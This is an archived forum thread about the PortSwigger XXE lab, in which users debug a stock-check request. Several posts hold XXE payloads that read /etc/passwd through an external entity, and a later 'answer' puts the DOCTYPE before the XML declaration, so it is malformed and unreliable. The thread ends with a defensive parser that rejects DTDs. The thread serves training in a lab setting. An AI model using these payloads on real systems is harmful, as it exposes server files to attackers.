The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Lab: Exploiting XXE using external entities to retrieve files

Regan | Last updated: Jun 15, 2019 03:19PM UTC

Relevant Links:
https://portswigger.net/web-security/xxe
https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files

I am trying to complete this lab and I am unsure what I am doing wrong. Any help would be greatly appreciated. I have tried many variants of the syntax, but basically, the HTTP request is below:

-------------------------------------------
POST /product/stock HTTP/1.1
Host: acfc205d38843c2c80fd980100af0078.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://acfc205d38843c2c80fd980100af0078.web-security-academy.net/product?productId=13
Cookie: session=aDJvRrAxYrf804mh6rJzMmjl2195R7IN
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 168

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
-------------------------------------------

Then I get the following response in Burp Suite:

-------------------------------------------
HTTP/1.1 400 Bad Request
Date: Sat, 15 Jun 2019 14:23:02 GMT
Content-Type: application/json
Content-Length: 86
Connection: close
Content-Security-Policy: default-src 'self'; script-src 'self'; img-src 'self'; style-src 'self'; frame-src 'self'; connect-src 'self' ws://localhost:3333; font-src 'self'; media-src 'self'; object-src 'none'; child-src 'self' blob:
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY

"XML parser exited with non-zero code 1: Content is not allowed in trailing section. "
-------------------------------------------

Thank you.

PortSwigger Agent | Last updated: Jun 17, 2019 08:09AM UTC

I just checked this lab and the solution is working correctly for me. Please ensure Repeater is configured to automatically update Content-Length.

Burp User | Last updated: Jun 19, 2019 08:19PM UTC

I am getting the same results as Regan. Content-Length seems to be related to request headers, not Repeater. Can somebody help?

Burp User | Last updated: Jun 20, 2019 03:09AM UTC

Use Repeater instead of Intruder. I used the snippet below and got the expected results!

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

Burp User | Last updated: Dec 05, 2019 10:22AM UTC

Is it because you are using Windows? Windows doesn't have a file named /etc/passwd.

Burp User | Last updated: Feb 09, 2020 08:52AM UTC

@Daniel You are using a web application, not accessing your own system. When you access any website, for example Facebook or Portswigger.net, it depends on which server PortSwigger is using, not which operating system you're using. You just access their services via the browser.

And the answer:

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
<productId>&xxe;</productId>
<storeId>1</storeId>
</stockCheck>

or

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "file:///etc/passwd"> %xxe; ]>
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
<productId>1</productId>
<storeId>1</storeId>
</stockCheck>
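Added example, not part of any post in this thread and not PortSwigger's code: the server-side counterpart to the payloads above, a stock-check parser that refuses any DOCTYPE before an entity can be defined. The function name parse_stock_check and the rule that both IDs are decimal integers are assumptions made for illustration.

```python
import xml.parsers.expat

class DTDForbidden(ValueError):
    """Request body carried a DOCTYPE or an entity declaration."""

def parse_stock_check(body: bytes) -> dict:
    """Parse a <stockCheck> body; refuse any DTD; return integer IDs."""
    fields, stack = {}, []   # child element text, currently open elements

    def forbid(*_args):
        # Fires at the DOCTYPE, before any entity is defined or resolved.
        raise DTDForbidden("DOCTYPE/entity declarations are not accepted")

    def start(name, _attrs):
        stack.append(name)
        if len(stack) == 1 and name != "stockCheck":
            raise ValueError("unexpected root element")
        if len(stack) == 2:
            fields[name] = ""

    def end(_name):
        stack.pop()

    def text(data):
        if len(stack) == 2:          # only direct children of the root
            fields[stack[-1]] += data

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = forbid
    parser.EntityDeclHandler = forbid
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text
    parser.Parse(body, True)

    if set(fields) != {"productId", "storeId"}:
        raise ValueError("expected exactly productId and storeId")
    values = {k: v.strip() for k, v in fields.items()}
    if not all(v.isascii() and v.isdigit() for v in values.values()):
        raise ValueError("IDs must be decimal integers")
    return {k: int(v) for k, v in values.items()}

if __name__ == "__main__":
    # Constructed benign request body.
    ok = b"<stockCheck><productId>13</productId><storeId>1</storeId></stockCheck>"
    print(parse_stock_check(ok))
```

Rejecting the DOCTYPE outright, rather than filtering for file:// URLs, also covers the parameter-entity variant quoted in the thread.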

yusuf | Last updated: May 16, 2021 12:08PM UTC